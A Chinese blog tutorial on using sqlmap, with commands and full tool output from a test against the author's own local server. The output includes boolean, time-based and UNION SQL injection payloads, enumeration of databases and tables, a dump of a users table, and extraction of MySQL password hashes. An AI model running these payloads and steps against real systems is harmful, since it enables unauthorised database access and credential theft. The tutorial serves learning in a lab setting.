sqlmap

Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。

安装

pip install sqlmap

查看帮助文档

sqlmap -hh

中文文档

https://sqlmap.campfire.ga/

直连数据库

服务型数据库(mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

文件型数据库(sqlite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

初级实战

此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情

扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server

1. 扫描注入点

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1

        ___

       __H__

 ___ ___[,]_____ ___ ___  {1.5.5#pip}

|_ -| . ["]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'

[13:34:37] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:34:37] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

# Title: Generic UNION query (NULL) - 5 columns 注入点

2. 根据注入点查到全部数据库 --dbs

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'

[13:40:12] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:40:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:40:12] [INFO] fetching database names

available databases [6]:

[*] atplant

[*] information_schema

[*] mysql

[*] performance_schema

[*] sys

[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. 根据指定数据库来查所有表

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

        ___

       __H__

 ___ ___[.]_____ ___ ___  {1.5.5#pip}

|_ -| . [(]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'

[14:57:47] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:57:47] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'

Database: uniapp_shop

[36 tables]

+----------------------------+

| dt_article                 |

| dt_article_albums          |

| dt_article_attach          |

| dt_article_attribute_field |

| dt_article_attribute_value |

| dt_article_category        |

| dt_article_comment         |

| dt_brands                  |

| dt_channel                 |

| dt_channel_field           |

| dt_channel_site            |

| dt_express                 |

| dt_feedback                |

| dt_link                    |

| dt_mail_template           |

| dt_manager                 |

| dt_manager_log             |

| dt_manager_role            |

| dt_manager_role_value      |

| dt_navigation              |

| dt_order_goods             |

| dt_orders                  |

| dt_payment                 |

| dt_sms_template            |

| dt_user_amount_log         |

| dt_user_attach_log         |

| dt_user_code               |

| dt_user_group_price        |

| dt_user_groups             |

| dt_user_login_log          |

| dt_user_message            |

| dt_user_oauth              |

| dt_user_oauth_app          |

| dt_user_point_log          |

| dt_user_recharge           |

| dt_users                   |

+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3.根据表来爆字段(mysql版本>5.0)

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

        ___

       __H__

 ___ ___[)]_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'

[14:59:01] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:59:01] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[22 columns]

+-----------+--------------+

| Column    | Type         |

+-----------+--------------+

| exp       | int          |

| address   | varchar(255) |

| amount    | double       |

| area      | varchar(255) |

| avatar    | varchar(255) |

| birthday  | timestamp    |

| email     | varchar(50)  |

| group_id  | int          |

| id        | int          |

| mobile    | varchar(20)  |

| msn       | varchar(100) |

| nick_name | varchar(100) |

| password  | varchar(100) |

| point     | int          |

| qq        | varchar(20)  |

| reg_ip    | varchar(20)  |

| reg_time  | timestamp    |

| salt      | varchar(20)  |

| sex       | varchar(20)  |

| status    | int          |

| telphone  | varchar(50)  |

| user_name | varchar(100) |

+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. 根据字段名查到表中的数据

注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  [']_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'

[15:03:52] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[15:03:52] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[1 entry]

+-----------+----+

| user_name | id |

+-----------+----+

| test      | 1  |

+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'

[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. 获取当前数据库用户及hash密码

命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  [(]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'

[14:40:02] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[14:40:02] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:40:02] [INFO] fetching database users password hashes

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

[14:40:05] [WARNING] no clear password(s) found

database management system users password hashes:

[*] develop [1]:

    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD

[*] mysql.infoschema [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.session [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.sys [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] root [2]:

    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC

    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/

最后

请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档

参考资料

sqlmap中文文档

sql注入实战讲解

SQL注入:Sqlmap初体验的更多相关文章

  1. Spring JDBCTemplate连接SQL Server之初体验

    前言 在没有任何框架的帮助下我们操作数据库都是用jdbc,耗时耗力,那么有了Spring,我们则不用重复造轮子了,先来试试Spring JDBC增删改查,其中关键就是构造JdbcTemplate类. ...

  2. SQL注入--SQLMap过WAF

    单引号被过滤情况: 空格.等号未被过滤情况: select被过滤情况: 以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤. 比如空格被过滤可以使用space2com ...

  3. 一次对真实网站的SQL注入———SQLmap使用

    网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点 ...

  4. Saturday SQL Server 2016 初体验

    最近在开发一个有关数据库的项目,我想用SQLite,但是SQLite的设计器不是特别友好,然后据说VS有一个集成的SQLite设计器,但是我用的VS2017亲测并没有,用户体验不佳,所以安装一个SQL ...

  5. 普通SQL注入

    安全防御:过滤/转义非法参数,屏蔽SQL查询错误. 工具:Firefox,hackbar,sqlmap,burpsuite 1.联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 ...

  6. SQL注入(dvwa环境)

    首先登录DVWA主页: 1.修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中. 2.进入SQL Injection页面,出错了.(心里想着这DVWA是官网下的不至于玩不 ...

  7. 2017-2018-2 20179204《网络攻防实践》第十一周学习总结 SQL注入攻击与实践

    第1节 研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 1.1 原理 在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统 ...

  8. sql注入知识点

    需找sql注入点1\无特定目标inurl:.php?id= 2\有特定目标:inurl:.php?id= site:target.com 3\工具爬取spider,对搜索引擎和目标网站的链接进行爬取 ...

  9. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

随机推荐

  1. Flutter学习简记

    StatefulWidget和StatelessWidget StatefulWidget : 具有可变状态的窗口部件,也就是你在使用应用的时候就可以随时变化,比如我们常见的进度条,随着进度不断变化. ...

  2. Linux系统(Centos7)最新版本Docker简易(yum)安装步骤

    Docker从1.13版本之后采用时间线的方式作为版本号,分为社区版CE和企业版EE. 社区版是免费提供给个人开发者和小型团体使用的,企业版会提供额外的收费服务,比如经过官方测试认证过的基础设施.容器 ...

  3. ch1_6_5求解旋转词问题

    import java.util.Scanner; public class ch1_6_5求解旋转词问题 { public static void main(String[] args) { // ...

  4. Amundsen在REA Group公司的应用实践

    REA Group是一家专门面向房地产与实业资产的跨国数字广告公司. 他们主要为消费者提供房地产购买.出售与租赁服务,同时发布各类房产新闻.装修技巧以及生活方式层面的内容.每一天,都有数百万消费者访问 ...

  5. java例题_08 输入特定数字求和(n个a位数递增求和问题)

    1 /*8 [程序 8 输入数字求和] 2 题目:求 s=a+aa+aaa+aaaa+aa...a 的值,其中 a 是一个数字.例如 2+22+222+2222+22222(此时共有 5 个数相加), ...

  6. vue 快速入门 系列 —— 侦测数据的变化 - [vue 源码分析]

    其他章节请看: vue 快速入门 系列 侦测数据的变化 - [vue 源码分析] 本文将 vue 中与数据侦测相关的源码摘了出来,配合上文(侦测数据的变化 - [基本实现]) 一起来分析一下 vue ...

  7. shell分支与循环结构

    1. 条件选择 1.1 条件判断分支介绍 格式 if COMMANDS; then COMMANDS; [ elif COMMANDS; then COMMANDS; ]... [ else COMM ...

  8. [递推]C. 【例题3】数的划分

    C . [ 例 题 3 ] 数 的 划 分 C. [例题3]数的划分 C.[例题3]数的划分 题目描述 将整数 n n n 分成 k k k 份,且每份不能为空,任意两个方案不相同(不考虑顺序). 例 ...

  9. 201871030107-常雅伦 实验三 结对项目—《D{0-1}KP 实例数据集算法实验平台》项目报告

    项目 内容 课程班级博客链接 班级博客 这个作业要求链接 作业要求 我的课程学习目标 1.体验软件项目开发中的两人合作,练习结对编程(Pair programming).2.掌握Github协作开发程 ...

  10. Go+gRPC-Gateway(V2) 微服务实战,小程序登录鉴权服务(四):客户端强类型约束,自动生成 API TS 类型定义

    系列 云原生 API 网关,gRPC-Gateway V2 初探 Go + gRPC-Gateway(V2) 构建微服务实战系列,小程序登录鉴权服务:第一篇 Go + gRPC-Gateway(V2) ...